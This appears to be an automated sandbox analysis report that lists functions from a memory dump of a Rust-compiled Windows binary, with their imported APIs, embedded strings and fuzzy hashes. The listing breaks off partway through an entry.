Instruction ID: a5e28261cdd362fd5bf75ff9d2f06cb125d5306a176b431ea459e1b988410351
Opcode Fuzzy Hash: 0342860675461f0b20e08d9a2fdbebe81f3f7dcae1fddb8a0acb782e836da0a9
Instruction Fuzzy Hash: 44A1B1A2A04BC989EB319FA6D9447E86365FB04B88F004135DF1C9BB99EF38D6919300

Function 00007FF63D26D280 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF63D26D300
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF63D26D324
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF63D26D38A
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF63D26D3A5
GetLastError.KERNEL32 ref: 00007FF63D26D3AF

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D26D3DC, 00007FF63D26D476

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Address$Wake$Single$ErrorLastWait
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 798958160-2333694755
Opcode ID: cd302619e39ff7fc371fd1f27c6b2ef57ef3d3f9db92bdbf5a41809f3225fba1
Instruction ID: d6a9da5708c71eb8d0698c37d10b4d1aa29f6887e83a5479b73f5ee291dcdd6d
Opcode Fuzzy Hash: cd302619e39ff7fc371fd1f27c6b2ef57ef3d3f9db92bdbf5a41809f3225fba1
Instruction Fuzzy Hash: 1151B122A0C79E85FB219FA1A6002BE67A0BB01B54F444532DFED977C2EE7CF555A340

Function 00007FF63D26B8E0 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 307COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D26B944
memcpy.MSVCRT ref: 00007FF63D26BA24
memcpy.MSVCRT ref: 00007FF63D26BC12

Strings

AppData/Roaming/.ini, xrefs: 00007FF63D26B9C9, 00007FF63D26BB0A, 00007FF63D26BCA2
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D26BB05
assertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FF63D26BA6A

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$AppData/Roaming/.ini$assertion failed: is_code_point_boundary(self, new_len)
API String ID: 3510742995-3583678413
Opcode ID: ed0b1ed9c4e76238d366cb2176a840bfc7e87afff67f0850cb94e2065038582c
Instruction ID: dae78cfdd6db10abfc93a5c90a5bd2c4caa7110e8c66e394835f3492241d9481
Opcode Fuzzy Hash: ed0b1ed9c4e76238d366cb2176a840bfc7e87afff67f0850cb94e2065038582c
Instruction Fuzzy Hash: 79B1D652F0879944FB119BA29A002FD6760BF55BC8F488435EF4D9778AFE7CE581E240

Function 00007FF63D282020 Relevance: 9.2, APIs: 6, Instructions: 249COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D28211A
GetFullPathNameW.KERNEL32 ref: 00007FF63D28212F
GetLastError.KERNEL32 ref: 00007FF63D28213A
GetLastError.KERNEL32 ref: 00007FF63D282153
GetLastError.KERNEL32 ref: 00007FF63D282213
memcpy.MSVCRT ref: 00007FF63D2822D2

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$FullNamePathmemcpy
String ID:
API String ID: 674145353-0
Opcode ID: ea713346e84e7ddf4ad49fcad697a07c0b7a6ead2b039cd3169ce72f6521a79b
Instruction ID: 42875e633e08b2d151ca5bd572a9c85973c424fd076a477b83a8360ab1dbb59f
Opcode Fuzzy Hash: ea713346e84e7ddf4ad49fcad697a07c0b7a6ead2b039cd3169ce72f6521a79b
Instruction Fuzzy Hash: DCA1C162B08B8A45EB759FA1DA543B96255FF45BC8F548035DF0C9B78AEE3CE740A300

Function 00007FF63D275CA0 Relevance: 9.2, APIs: 6, Instructions: 177COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D275D8A
GetFinalPathNameByHandleW.KERNEL32 ref: 00007FF63D275D9F
GetLastError.KERNEL32 ref: 00007FF63D275DAA
GetLastError.KERNEL32 ref: 00007FF63D275DC3
GetLastError.KERNEL32 ref: 00007FF63D275E5F
CloseHandle.KERNEL32 ref: 00007FF63D275F72

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$Handle$CloseFinalNamePath
String ID:
API String ID: 3328380333-0
Opcode ID: eb9573fc9ea8726f150f97a8aba0f077b8ad1b128bcf2cd4243d47daf96ceab2
Instruction ID: b11b26e5ce75c6a3d6162dc9fa131475c4160e78a4d3c0cc6f60bd211f1f9140
Opcode Fuzzy Hash: eb9573fc9ea8726f150f97a8aba0f077b8ad1b128bcf2cd4243d47daf96ceab2
Instruction Fuzzy Hash: 0061D562E04BCA59FB359FA19A443F9A354AB04BD8F104131DF5C9BB86EF7C9281A300

Function 00007FF63D286F20 Relevance: 9.1, APIs: 6, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fac17a91ac0aa96a30903797cb92da92005fb0a5ad60f8718f1c36a8f21e8c8
Instruction ID: bc8c56086ee65ec7cc124d63ae026207888066672e595621517c9fa9dd063451
Opcode Fuzzy Hash: 3fac17a91ac0aa96a30903797cb92da92005fb0a5ad60f8718f1c36a8f21e8c8
Instruction Fuzzy Hash: 0C51BA32A08B9589FB219FA5E6453E967A0FB44798F044134EF8D47B8AEF3CE185D340

Function 00007FF63D27F377 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D27F381
CloseHandle.KERNEL32 ref: 00007FF63D27F3AF
CloseHandle.KERNEL32 ref: 00007FF63D27F3C4
CloseHandle.KERNEL32 ref: 00007FF63D27F923

Strings

0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D27F941
program path has no file name, xrefs: 00007FF63D27F990

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle
String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
API String ID: 2962429428-4245703473
Opcode ID: 688fe29e9296e47face9f1dc11be20400f2cec6343617790042bbab9edfb9346
Instruction ID: 2f0e3ea3f768cdd6d36f1152f2d3b9c246d322bcd94c3a4612efe22625f8293b
Opcode Fuzzy Hash: 688fe29e9296e47face9f1dc11be20400f2cec6343617790042bbab9edfb9346
Instruction Fuzzy Hash: 56516362E0CA8995EF749AA2DA047FA2350FF85B98F404436DF1DD7796EE3CE541A300

Function 00007FF63D273480 Relevance: 9.1, APIs: 6, Instructions: 116fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D273501
FindNextFileW.KERNEL32 ref: 00007FF63D27350C
memcpy.MSVCRT ref: 00007FF63D273564
memcpy.MSVCRT ref: 00007FF63D2735C1

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy$FileFindNextmemset
String ID:
API String ID: 187231533-0
Opcode ID: ecacff8f96c341aa5a00c7f8fc63f22e03bd63d84b78354060635aace350bf4e
Instruction ID: 3fa9f791fe2525761146e0c67e5e71f7ba1d9e5241a1f4e6fd61dcdf25cdde2a
Opcode Fuzzy Hash: ecacff8f96c341aa5a00c7f8fc63f22e03bd63d84b78354060635aace350bf4e
Instruction Fuzzy Hash: 7D41AD62E0860A95EB749BA1D6407B962A0FB14B94F858131DFAD877C2FF3CF491E300

Function 00007FF63D257940 Relevance: 9.1, APIs: 6, Instructions: 92timesleepsynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerExW.KERNEL32 ref: 00007FF63D2579A1
SetWaitableTimer.KERNEL32 ref: 00007FF63D2579F4
WaitForSingleObject.KERNEL32 ref: 00007FF63D257A05
CloseHandle.KERNEL32 ref: 00007FF63D257A10
CloseHandle.KERNEL32 ref: 00007FF63D257A20
Sleep.KERNEL32 ref: 00007FF63D257A69

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
String ID:
API String ID: 2261246915-0
Opcode ID: 72e9249e10d04ea31e222df16e307ed292eb138d76baae3c62a0bd4991e56d0a
Instruction ID: b41c64d42cea6dc9384b619874a580cda6356c008371bbc57299188b75e82f52
Opcode Fuzzy Hash: 72e9249e10d04ea31e222df16e307ed292eb138d76baae3c62a0bd4991e56d0a
Instruction Fuzzy Hash: 6E214522F49A5A06FE6C96F52716B3480471B85BA0E089235EF1EC7BD9ED3DEA006600

Function 00007FF63D2776B0 Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF63D277701
WSASocketW.WS2_32 ref: 00007FF63D277731
SetHandleInformation.KERNEL32 ref: 00007FF63D27774C
GetLastError.KERNEL32 ref: 00007FF63D277755
closesocket.WS2_32 ref: 00007FF63D277767
WSAGetLastError.WS2_32 ref: 00007FF63D277776

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$HandleInformationSocketclosesocket
String ID:
API String ID: 1159780279-0
Opcode ID: 89236558c6572c69d8797d5ee2b66b3e15e28f56c0e71b4a2d265fc120f2cf61
Instruction ID: 750c116f8fc04b8d2b87636aed4ef67b69840c45470248de4a383d190b40dc3a
Opcode Fuzzy Hash: 89236558c6572c69d8797d5ee2b66b3e15e28f56c0e71b4a2d265fc120f2cf61
Instruction Fuzzy Hash: 8F119D21F0806946F73059B99645B761580AB887F8F144330EF6DC7BCAFDBD9C826A00

Function 00007FF63D299672 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 52COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF63D2996F2

Strings

R9_U, xrefs: 00007FF63D299691
R9_F, xrefs: 00007FF63D2996C9
TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL, xrefs: 00007FF63D2996E5
R8_U, xrefs: 00007FF63D299672
R8_F, xrefs: 00007FF63D2996AD

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcmp
String ID: R8_F$R8_U$R9_F$R9_U$TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL
API String ID: 1475443563-1802361725
Opcode ID: 337bd77bac466ef6af75d31728e79a359992667c230a7dcc0bfcfa1e8b9874c2
Instruction ID: c2d37e67ee546e254fcf53b6b735e3ba0614a7594a0eefc663da2a3375c33825
Opcode Fuzzy Hash: 337bd77bac466ef6af75d31728e79a359992667c230a7dcc0bfcfa1e8b9874c2
Instruction Fuzzy Hash: CA11E9A3E1842A47F7708A75A600AB655D0DF05BA5F147030DA4DC77E0FE3FE961AE90

Function 00007FF63D257AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D28C340: TlsGetValue.KERNEL32 ref: 00007FF63D28C362
Part of subcall function 00007FF63D28C340: TlsGetValue.KERNEL32 ref: 00007FF63D28C3C3
Part of subcall function 00007FF63D28C340: TlsSetValue.KERNEL32 ref: 00007FF63D28C3D3

WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF63D257BBE
GetLastError.KERNEL32 ref: 00007FF63D257BC8
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF63D257CE9
GetLastError.KERNEL32 ref: 00007FF63D257CF3

Strings

use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF63D257BCF, 00007FF63D257D19

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Value$AddressErrorLastWait
String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
API String ID: 1881407604-63010627
Opcode ID: c63a79c920b23dd25f0e73757991695bfd17002a75ce36b5631c1c8cc01a7c61
Instruction ID: 3066186f00a34041754a84fdec14252d1f5419a025f1a462684e22dbc491850c
Opcode Fuzzy Hash: c63a79c920b23dd25f0e73757991695bfd17002a75ce36b5631c1c8cc01a7c61
Instruction Fuzzy Hash: E3516622F59E8A98FB159BE08A006FC6761AF40754F548132DF4D97BC9FE2CA842E300

Function 00007FF63D26F310 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 498COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D26F383
memcpy.MSVCRT ref: 00007FF63D26F434
memcpy.MSVCRT ref: 00007FF63D26F577

Strings

PATHlibrary\std\src\sys_common\process.rs, xrefs: 00007FF63D26F3D1, 00007FF63D26F5DB
assertion failed: self.height > 0, xrefs: 00007FF63D26FB07

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: PATHlibrary\std\src\sys_common\process.rs$assertion failed: self.height > 0
API String ID: 3510742995-3507162100
Opcode ID: a087237bcf938bba385ece63445749f83ecff70f4101cd1bdba2c2cdc9de05ae
Instruction ID: a722cef2b9b517a2c9fc220fe47ea69c0a6eb4b9da794191b5dfd8d129b75e7f
Opcode Fuzzy Hash: a087237bcf938bba385ece63445749f83ecff70f4101cd1bdba2c2cdc9de05ae
Instruction Fuzzy Hash: D232C122A08BC984EB229F65D9403FC63A0FF54B98F144131DF4D5BB96EF79A296D300

Function 00007FF63D243A70 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 364COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D243F55
memcpy.MSVCRT ref: 00007FF63D243F6E

Strings

assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF63D245E73
0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D243A71
assertion failed: old_left_len >= count, xrefs: 00007FF63D244C1A

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: old_left_len >= count
API String ID: 3510742995-2606162457
Opcode ID: 4930317a2fd92120e4bc59f8b9b2d04c06098b35c20cfe02a10b2916d063e656
Instruction ID: 3ee4ab9710a33178c676e46c174828641423e2a0dee052490c83f4ce858e198c
Opcode Fuzzy Hash: 4930317a2fd92120e4bc59f8b9b2d04c06098b35c20cfe02a10b2916d063e656
Instruction Fuzzy Hash: 71E1DD62F09B8982EB498BA5DA407B963B0FF44B94F848135DF5D97390EF39E691D300

Function 00007FF63D283550 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 267COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D2836A1
memcpy.MSVCRT ref: 00007FF63D28381B
memcpy.MSVCRT ref: 00007FF63D2838B4

Strings

0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D283551
program path has no file name, xrefs: 00007FF63D28355B

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
API String ID: 3510742995-4245703473
Opcode ID: 5c48e4c39586f8f585aba54d1f6d3e192b2042a8855fe34e5db6de5f69e32e97
Instruction ID: f3d68de1f6b55ad4f10f9ca0e5ee53f0286a553e69f18824f9de05cc770856c4
Opcode Fuzzy Hash: 5c48e4c39586f8f585aba54d1f6d3e192b2042a8855fe34e5db6de5f69e32e97
Instruction Fuzzy Hash: 35A1A172F18B5A45FB108BA59A00ABD6761BB05BD8F448931DF1DD7B89EF7CE141A300

Function 00007FF63D2454E0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D24556E
memcpy.MSVCRT ref: 00007FF63D2455A5

Strings

assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF63D245E73
assertion failed: old_left_len + count <= CAPACITY, xrefs: 00007FF63D245092
assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF63D2454A7, 00007FF63D2458A3

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
